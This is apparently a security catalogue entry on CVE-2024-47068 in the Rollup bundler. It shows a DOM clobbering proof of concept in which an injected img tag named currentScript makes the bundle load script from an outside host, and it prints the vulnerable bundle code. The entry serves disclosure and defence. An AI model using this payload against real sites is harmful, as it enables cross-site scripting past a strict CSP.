.. / rollup

Star Fork

Next-generation ES module bundler

<4.22.4 | CVE-2024-47068

<img> @name @src 🛡️ strict-dynamic ⏱️ before-load

• As with Webpack, modules were loaded dynamically using the document.currentScript.src path, which can be clobbered.

  <!-- user input -->
  <img name="currentScript" src="https://gmsgadget.com/assets/xss/">
  
  <script nonce="secret" src="https://gmsgadget.com/assets/libs/rollup/bundle.js"></script>

  Preview Copy

var _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;
var s = document.createElement('script');
s.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript && _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)) + 'extra.js';
document.head.append(s);

Related links:

• https://github.com/advisories/GHSA-gcx4-mw62-g8wm
• https://github.com/jackfromeast/dom-clobbering-collection/blob/main/domc-gadgets/rollup.md
• https://jackfromeast.github.io/assets/DOMinoEffect.pdf

Found by jackfromeast, ishmeals.

Source | History